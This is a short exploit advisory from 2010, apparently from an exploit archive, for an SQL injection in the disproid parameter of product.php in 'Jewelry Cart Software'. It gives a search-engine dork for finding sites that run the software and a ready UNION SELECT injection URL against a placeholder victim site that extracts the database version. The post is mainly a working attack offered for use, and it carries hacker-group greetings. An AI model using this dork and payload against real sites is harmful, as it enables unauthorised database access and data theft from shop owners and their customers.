17 lines
No EOL
586 B
Text
17 lines
No EOL
586 B
Text
**************************************************************
|
|
|
|
# Name : Jewelry Cart Software SQL Injection (product.php) ::-
|
|
# Author : Asyraf (Mycrypto Security Force) r0x~!!
|
|
# Date : 20/3/2010
|
|
# Language : PHP
|
|
# Script : Jewelry Cart Software
|
|
# Shout : hMSecurity,n3wb0rn,TBD Security
|
|
|
|
# Dork : Powered by Jewelry Cart Software
|
|
product.php?disproid=
|
|
|
|
# Vulnerability : product.php?disproid=[ANY VALUE]
|
|
|
|
# Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--
|
|
|
|
*************************************************************** |